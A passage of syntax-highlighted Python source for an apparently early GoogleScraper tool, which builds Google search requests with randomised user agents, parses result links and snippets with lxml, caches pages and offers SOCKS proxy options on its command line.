<span class="s1">'rc'</span><span class="p">:</span> <span class="s1">''</span><span class="p">,</span> <span class="c1"># Request an accurate result count for up to 1M documents. If a user submits a search query without the site parameter, the entire search index is queried.</span>
<span class="s1">'site'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Limits search results to the contents of the specified collection.</span>
<span class="s1">'sort'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Specifies a sorting method. Results can be sorted by date.</span>
<span class="s1">'client'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># required parameter. Indicates a valid front end.</span>
<span class="s1">'output'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># required parameter. Selects the format of the search results.</span>
<span class="s1">'partialfields'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Restricts the search results to documents with meta tags whose values contain the specified words or phrases.</span>
<span class="s1">'pws'</span><span class="p">:</span> <span class="s1">'0'</span><span class="p">,</span> <span class="c1"># personalization turned off</span>
<span class="s1">'cd'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Passes down the keyword rank clicked.</span>
<span class="s1">'filter'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="c1"># Include omitted results</span>
<span class="s1">'complete'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="c1"># Turn auto-suggest and Google Instant on (=1) or off (=0)</span>
<span class="s1">'nfpr'</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span> <span class="c1"># Turn off auto-correction of spelling</span>
<span class="s1">'ncr'</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span> <span class="c1"># No country redirect: Allows you to set the Google country engine you would like to use despite your current geographic location.</span>
<span class="s1">'safe'</span><span class="p">:</span> <span class="s1">'off'</span><span class="p">,</span> <span class="c1"># Turns the adult content filter on or off</span>
<span class="s1">'rls'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Source of the query, with the version of the client and the language set</span>
<span class="s1">'source'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Google navigational parameter specifying where you came from, here universal search</span>
<span class="s1">'tbm'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Used when you select any of the “special” searches, like image search or video search</span>
<span class="s1">'tbs'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Undocumented, like `tbm`. Restricts the time frame of the results you want to obtain.</span>
<span class="c1"># Examples: Any time: tbs=qdr:a, Last second: tbs=qdr:s, Last minute: tbs=qdr:n, Last day: tbs=qdr:d, Time range: tbs=cdr:1,cd_min:3/2/1984,cd_max:6/5/1987</span>
<span class="c1"># But the tbs parameter is also used to specify content:</span>
<span class="c1"># Examples: Sites with images: tbs=img:1, Results by reading level, Basic level: tbs=rl:1,rls:0, Results that are translated from another language: tbs=clir:1,</span>
<span class="c1"># For full documentation, see http://stenevang.wordpress.com/2013/02/22/google-search-url-request-parameters/</span>
<span class="s1">'lr'</span><span class="p">:</span> <span class="s1">'lang_de'</span><span class="p">,</span> <span class="c1"># Restricts searches to pages in the specified language. If there are no results in the specified language, the search appliance displays results in all languages.</span>
<span class="c1"># lang_xx where xx is the language code such as en, de, fr, ca, ...</span>
<span class="s1">'hl'</span><span class="p">:</span> <span class="s1">'en'</span><span class="p">,</span> <span class="c1"># Language settings passed down by your browser</span>
<span class="s1">'cr'</span><span class="p">:</span> <span class="s1">'countryDE'</span><span class="p">,</span> <span class="c1"># The region the results should come from</span>
<span class="s1">'gr'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Just as gl shows you how results look in a specified country, gr limits the results to a certain region</span>
<span class="s1">'gcs'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Limits results to a certain city, you can also use latitude and longitude</span>
<span class="s1">'gpc'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Limits results to a certain zip code</span>
<span class="s1">'gm'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># Limits results to a certain metropolitan region</span>
<span class="s1">'gl'</span><span class="p">:</span> <span class="s1">'de'</span><span class="p">,</span> <span class="c1"># Shows results as if the search was conducted in the specified location. Can be unreliable.</span>
<span class="s1">'ie'</span><span class="p">:</span> <span class="s1">'utf-8'</span><span class="p">,</span> <span class="c1"># Sets the character encoding that is used to interpret the query string.</span>
<span class="s1">'oe'</span><span class="p">:</span> <span class="s1">'utf-8'</span> <span class="c1"># Sets the character encoding that is used to encode the results.</span>
<span class="p">}</span>
<span class="c1"># Update the default search params if the user supplied a dictionary</span>
<span class="k">if</span> <span class="n">search_params</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span> <span class="ow">and</span> <span class="nb">isinstance</span><span class="p">(</span><span class="n">search_params</span><span class="p">,</span> <span class="nb">dict</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">search_params</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'cache_file'</span><span class="p">:</span> <span class="kc">None</span><span class="p">,</span> <span class="c1"># A path to a file that caches the results.</span>
<span class="s1">'search_keyword'</span><span class="p">:</span> <span class="bp">self</span><span class="o">.</span><span class="n">search_query</span><span class="p">,</span> <span class="c1"># The query keyword</span>
<span class="s1">'num_results_for_kw'</span><span class="p">:</span> <span class="s1">''</span><span class="p">,</span> <span class="c1"># The number of results for the keyword</span>
<span class="s1">'results'</span><span class="p">:</span> <span class="p">[]</span> <span class="c1"># List of Result named tuples</span>
<span class="p">}</span>
<span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">"""Perform the scrape and clean the URLs."""</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_search</span><span class="p">()</span>
<span class="c1"># Now try to create ParseResult objects from the URL</span>
<span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">e</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span><span class="p">[</span><span class="s1">'results'</span><span class="p">]):</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">url</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'/url\?q=(.*?)&sa=U&ei='</span><span class="p">,</span> <span class="n">e</span><span class="o">.</span><span class="n">link_url</span><span class="p">)</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="k">assert</span> <span class="bp">self</span><span class="o">.</span><span class="n">_REGEX_VALID_URL</span><span class="o">.</span><span class="n">match</span><span class="p">(</span><span class="n">url</span><span class="p">)</span><span class="o">.</span><span class="n">group</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span><span class="p">[</span><span class="s1">'results'</span><span class="p">][</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> \
<span class="bp">self</span><span class="o">.</span><span class="n">Result</span><span class="p">(</span><span class="n">link_title</span><span class="o">=</span><span class="n">e</span><span class="o">.</span><span class="n">link_title</span><span class="p">,</span> <span class="n">link_url</span><span class="o">=</span><span class="n">urllib</span><span class="o">.</span><span class="n">parse</span><span class="o">.</span><span class="n">urlparse</span><span class="p">(</span><span class="n">url</span><span class="p">),</span>
<span class="n">link_snippet</span><span class="o">=</span><span class="n">e</span><span class="o">.</span><span class="n">link_snippet</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">err</span><span class="p">:</span>
<span class="n">logger</span><span class="o">.</span><span class="n">warning</span><span class="p">(</span><span class="s2">"URL=</span><span class="si">{}</span><span class="s2"> found to be invalid."</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">e</span><span class="o">.</span><span class="n">link_url</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">_build_query</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">random</span><span class="o">=</span><span class="kc">False</span><span class="p">):</span>
<span class="sd">"""Build the headers and params for the GET request towards the Google server.</span>
<span class="sd"> When random is True, several headers (like the UA) are chosen</span>
<span class="sd"> randomly.</span>
<span class="sd"> """</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span><span class="o">.</span><span class="n">update</span><span class="p">(</span>
<span class="p">{</span><span class="s1">'q'</span><span class="p">:</span> <span class="bp">self</span><span class="o">.</span><span class="n">search_query</span><span class="p">,</span>
<span class="s1">'num'</span><span class="p">:</span> <span class="nb">str</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">num_results_per_page</span><span class="p">),</span>
<span class="s1">'start'</span><span class="p">:</span> <span class="nb">str</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">num_results_per_page</span><span class="p">)</span> <span class="o">*</span> <span class="nb">int</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">num_page</span><span class="p">))</span>
<span class="p">})</span>
<span class="k">if</span> <span class="n">random</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_HEADERS</span><span class="p">[</span><span class="s1">'User-Agent'</span><span class="p">]</span> <span class="o">=</span> <span class="n">choice</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_UAS</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">_search</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="sd">"""The actual search and parsing of the results.</span>
<span class="sd"> Private, internal method.</span>
<span class="sd"> Parsing is done with lxml and cssselect. The html structure of the Google Search</span>
<span class="sd"> results may change over time. Effective: February 2014</span>
<span class="sd"> """</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_build_query</span><span class="p">()</span>
<span class="k">if</span> <span class="n">DO_CACHING</span><span class="p">:</span>
<span class="n">html</span> <span class="o">=</span> <span class="n">get_cached</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span><span class="p">[</span><span class="s1">'cache_file'</span><span class="p">]</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="n">cached_file_name</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span><span class="p">))</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">html</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">html</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_URL</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="bp">self</span><span class="o">.</span><span class="n">_HEADERS</span><span class="p">,</span>
<span class="n">params</span><span class="o">=</span><span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mf">3.0</span><span class="p">)</span>
<span class="n">logger</span><span class="o">.</span><span class="n">debug</span><span class="p">(</span><span class="s2">"Scraped with url: </span><span class="si">{}</span><span class="s2">"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">url</span><span class="p">))</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">ConnectionError</span> <span class="k">as</span> <span class="n">cerr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Network problem occurred: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">cerr</span><span class="p">))</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">except</span> <span class="n">requests</span><span class="o">.</span><span class="n">Timeout</span> <span class="k">as</span> <span class="n">terr</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Connection timeout: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">terr</span><span class="p">))</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">r</span><span class="o">.</span><span class="n">ok</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'HTTP Error:'</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">status_code</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">str</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">status_code</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'5'</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Maybe Google recognizes you as a sneaky spammer after'</span>
<span class="s1">' you requested their services too inexhaustibly :D'</span><span class="p">)</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="n">html</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">text</span>
<span class="c1"># cache fresh results</span>
<span class="k">if</span> <span class="n">DO_CACHING</span><span class="p">:</span>
<span class="n">cache_results</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span><span class="p">,</span> <span class="n">html</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span><span class="p">[</span><span class="s1">'cache_file'</span><span class="p">]</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">CACHEDIR</span><span class="p">,</span> <span class="n">cached_file_name</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_SEARCH_PARAMS</span><span class="p">))</span>
<span class="c1"># Try to parse the google HTML result using lxml</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">doc</span> <span class="o">=</span> <span class="n">UnicodeDammit</span><span class="p">(</span><span class="n">html</span><span class="p">,</span> <span class="n">is_html</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">lxml</span><span class="o">.</span><span class="n">html</span><span class="o">.</span><span class="n">HTMLParser</span><span class="p">(</span><span class="n">encoding</span><span class="o">=</span><span class="n">doc</span><span class="o">.</span><span class="n">declared_html_encoding</span><span class="p">)</span>
<span class="n">dom</span> <span class="o">=</span> <span class="n">lxml</span><span class="o">.</span><span class="n">html</span><span class="o">.</span><span class="n">document_fromstring</span><span class="p">(</span><span class="n">html</span><span class="p">,</span> <span class="n">parser</span><span class="o">=</span><span class="n">parser</span><span class="p">)</span>
<span class="n">dom</span><span class="o">.</span><span class="n">resolve_base_href</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Some error occurred while lxml tried to parse: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">e</span><span class="p">))</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="c1"># Try to extract all links of non-ad results, including their snippets (descriptions) and titles.</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">li_g_results</span> <span class="o">=</span> <span class="n">dom</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">HTMLTranslator</span><span class="p">()</span><span class="o">.</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="s1">'li.g'</span><span class="p">))</span>
<span class="n">links</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">li_g_results</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">link_element</span> <span class="o">=</span> <span class="n">e</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">HTMLTranslator</span><span class="p">()</span><span class="o">.</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="s1">'h3.r > a:first-child'</span><span class="p">))</span>
<span class="n">link</span> <span class="o">=</span> <span class="n">link_element</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'href'</span><span class="p">)</span>
<span class="n">title</span> <span class="o">=</span> <span class="n">link_element</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">IndexError</span> <span class="k">as</span> <span class="n">err</span><span class="p">:</span>
<span class="n">logger</span><span class="o">.</span><span class="n">error</span><span class="p">(</span><span class="s1">'Error while parsing link/title element: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">err</span><span class="p">))</span>
<span class="k">continue</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">snippet_element</span> <span class="o">=</span> <span class="n">e</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">HTMLTranslator</span><span class="p">()</span><span class="o">.</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="s1">'div.s > span.st'</span><span class="p">))</span>
<span class="n">snippet</span> <span class="o">=</span> <span class="n">snippet_element</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">IndexError</span> <span class="k">as</span> <span class="n">err</span><span class="p">:</span>
<span class="n">logger</span><span class="o">.</span><span class="n">error</span><span class="p">(</span><span class="s1">'Error while parsing snippet element: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">err</span><span class="p">))</span>
<span class="k">continue</span>
<span class="n">links</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">Result</span><span class="p">(</span><span class="n">link_title</span><span class="o">=</span><span class="n">title</span><span class="p">,</span> <span class="n">link_url</span><span class="o">=</span><span class="n">link</span><span class="p">,</span> <span class="n">link_snippet</span><span class="o">=</span><span class="n">snippet</span><span class="p">))</span>
<span class="c1"># Catch further errors besides parsing errors that take shape as IndexErrors</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">err</span><span class="p">:</span>
<span class="n">logger</span><span class="o">.</span><span class="n">error</span><span class="p">(</span><span class="s1">'Error in parsing result links: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">err</span><span class="p">))</span>
<span class="bp">self</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span><span class="p">[</span><span class="s1">'results'</span><span class="p">]</span><span class="o">.</span><span class="n">extend</span><span class="p">(</span><span class="n">links</span><span class="p">)</span>
<span class="c1"># try to get the number of results for our search query</span>
<span class="k">try</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span><span class="p">[</span><span class="s1">'num_results_for_kw'</span><span class="p">]</span> <span class="o">=</span> <span class="n">dom</span><span class="o">.</span><span class="n">xpath</span><span class="p">(</span><span class="n">HTMLTranslator</span><span class="p">()</span><span class="o">.</span><span class="n">css_to_xpath</span><span class="p">(</span><span class="s1">'div#resultStats'</span><span class="p">))[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">text_content</span><span class="p">()</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="n">logger</span><span class="o">.</span><span class="n">critical</span><span class="p">(</span><span class="n">e</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">scrape</span><span class="p">(</span><span class="n">query</span><span class="p">,</span> <span class="n">num_results_per_page</span><span class="o">=</span><span class="mi">100</span><span class="p">,</span> <span class="n">num_pages</span><span class="o">=</span><span class="mi">1</span><span class="p">,</span> <span class="n">offset</span><span class="o">=</span><span class="mi">0</span><span class="p">):</span>
<span class="sd">"""Public API function to search for terms and return a list of results.</span>
<span class="sd"> arguments:</span>
<span class="sd"> query -- the search query. Can be whatever you want to crawl google for.</span>
<span class="sd"> Keyword arguments:</span>
<span class="sd"> num_results_per_page -- the number of results per page. Either 10, 25, 50 or 100.</span>
<span class="sd"> num_pages -- The number of pages to search for.</span>
<span class="sd"> offset -- specifies the offset to the page to begin searching.</span>
<span class="sd"> """</span>
<span class="n">threads</span> <span class="o">=</span> <span class="p">[</span><span class="n">GoogleScrape</span><span class="p">(</span><span class="n">query</span><span class="p">,</span> <span class="n">num_results_per_page</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">offset</span><span class="p">,</span> <span class="n">num_pages</span> <span class="o">+</span> <span class="n">offset</span><span class="p">,</span> <span class="mi">1</span><span class="p">)]</span>
<span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="n">threads</span><span class="p">:</span>
<span class="n">t</span><span class="o">.</span><span class="n">start</span><span class="p">()</span>
<span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="n">threads</span><span class="p">:</span>
<span class="n">t</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="mf">3.0</span><span class="p">)</span>
<span class="k">return</span> <span class="p">[</span><span class="n">t</span><span class="o">.</span><span class="n">SEARCH_RESULTS</span> <span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="n">threads</span><span class="p">]</span>
<span class="k">def</span> <span class="nf">deep_scrape</span><span class="p">(</span><span class="n">query</span><span class="p">):</span>
<span class="sd">"""Launches many different Google searches with different parameter combinations to maximize return of results.</span>
<span class="sd"> @param query: The query to search for.</span>
<span class="sd"> @return: All the result sets.</span>
<span class="sd"> """</span>
<span class="c1"># First obtain some synonyms for the search query</span>
<span class="c1"># For each proxy, run the scrapes</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">parser</span> <span class="o">=</span> <span class="n">argparse</span><span class="o">.</span><span class="n">ArgumentParser</span><span class="p">(</span><span class="n">prog</span><span class="o">=</span><span class="s1">'GoogleScraper'</span><span class="p">,</span> <span class="n">description</span><span class="o">=</span><span class="s1">'Scrapes the Google search engine'</span><span class="p">,</span>
<span class="n">epilog</span><span class="o">=</span><span class="s1">'This program might infringe Google TOS, so use at your own risk'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'-q'</span><span class="p">,</span> <span class="s1">'--query'</span><span class="p">,</span> <span class="n">metavar</span><span class="o">=</span><span class="s1">'search_string'</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s1">'store'</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s1">'query'</span><span class="p">,</span> <span class="n">required</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span>
<span class="n">help</span><span class="o">=</span><span class="s1">'The search query.'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'-n'</span><span class="p">,</span> <span class="s1">'--num_results_per_page'</span><span class="p">,</span> <span class="n">metavar</span><span class="o">=</span><span class="s1">'number_of_results_per_page'</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">int</span><span class="p">,</span>
<span class="n">dest</span><span class="o">=</span><span class="s1">'num_results_per_page'</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s1">'store'</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="mi">50</span><span class="p">,</span>
<span class="n">help</span><span class="o">=</span><span class="s1">'The number of results per page. Must be at most 100'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'-p'</span><span class="p">,</span> <span class="s1">'--num_pages'</span><span class="p">,</span> <span class="n">metavar</span><span class="o">=</span><span class="s1">'num_of_pages'</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">int</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s1">'num_pages'</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s1">'store'</span><span class="p">,</span>
<span class="n">default</span><span class="o">=</span><span class="mi">1</span><span class="p">,</span>
<span class="n">help</span><span class="o">=</span><span class="s1">'The number of pages to search in. Each page is requested by a unique connection and if possible by a unique IP.'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'--proxy'</span><span class="p">,</span> <span class="n">metavar</span><span class="o">=</span><span class="s1">'proxycredentials'</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s1">'proxy'</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s1">'store'</span><span class="p">,</span>
<span class="n">required</span><span class="o">=</span><span class="kc">False</span><span class="p">,</span> <span class="c1">#default=('127.0.0.1', 9050)</span>
<span class="n">help</span><span class="o">=</span><span class="s1">'A string such as "127.0.0.1:9050" specifying a single proxy server'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'--proxy_file'</span><span class="p">,</span> <span class="n">metavar</span><span class="o">=</span><span class="s1">'proxyfile'</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s1">'proxy_file'</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s1">'store'</span><span class="p">,</span>
<span class="n">required</span><span class="o">=</span><span class="kc">False</span><span class="p">,</span> <span class="c1">#default='.proxies'</span>
<span class="n">help</span><span class="o">=</span><span class="s1">'A filename for a list of proxies (supported are HTTP PROXIES, SOCKS4/4a/5) with the following format: "Proxyprotocol (proxy_ip|proxy_host):Port</span><span class="se">\\</span><span class="s1">n"'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'-x'</span><span class="p">,</span> <span class="s1">'--deep-scrape'</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s1">'store_true'</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="kc">False</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s1">'Launches a wide range of parallel searches by modifying the search '</span>
<span class="s1">'query string with synonyms and by scraping with different Google search parameter combinations that might yield more unique '</span>
<span class="s1">'results. The algorithm is optimized for maximum of results for a specific keyword whilst trying avoid detection. This is the heart of GoogleScraper.'</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'--view'</span><span class="p">,</span> <span class="n">action</span><span class="o">=</span><span class="s1">'store_true'</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="kc">False</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s2">"View the response in a default browser tab."</span>
<span class="s2">" Mainly for debug purposes. Works only when caching is enabled."</span><span class="p">)</span>
<span class="n">parser</span><span class="o">.</span><span class="n">add_argument</span><span class="p">(</span><span class="s1">'-v'</span><span class="p">,</span> <span class="s1">'--verbosity'</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">int</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="mi">1</span><span class="p">,</span>
<span class="n">help</span><span class="o">=</span><span class="s2">"The verbosity of the output reporting for the found search results."</span><span class="p">)</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="o">.</span><span class="n">parse_args</span><span class="p">()</span>
<span class="k">if</span> <span class="n">args</span><span class="o">.</span><span class="n">proxy_file</span><span class="p">:</span>
<span class="k">raise</span> <span class="ne">NotImplementedError</span><span class="p">(</span><span class="s1">'Coming soon.'</span><span class="p">)</span>
<span class="k">if</span> <span class="n">args</span><span class="o">.</span><span class="n">proxy</span><span class="p">:</span>
<span class="k">def</span> <span class="nf">create_connection</span><span class="p">(</span><span class="n">address</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="kc">None</span><span class="p">,</span> <span class="n">source_address</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
<span class="n">sock</span> <span class="o">=</span> <span class="n">socks</span><span class="o">.</span><span class="n">socksocket</span><span class="p">()</span>
<span class="n">sock</span><span class="o">.</span><span class="n">connect</span><span class="p">(</span><span class="n">address</span><span class="p">)</span>
<span class="k">return</span> <span class="n">sock</span>
<span class="n">proxy_host</span><span class="p">,</span> <span class="n">proxy_port</span> <span class="o">=</span> <span class="n">args</span><span class="o">.</span><span class="n">proxy</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">':'</span><span class="p">)</span>
<span class="c1"># Patch the socket module</span>
<span class="n">socks</span><span class="o">.</span><span class="n">setdefaultproxy</span><span class="p">(</span><span class="n">socks</span><span class="o">.</span><span class="n">PROXY_TYPE_SOCKS5</span><span class="p">,</span> <span class="n">proxy_host</span><span class="p">,</span> <span class="nb">int</span><span class="p">(</span><span class="n">proxy_port</span><span class="p">),</span>
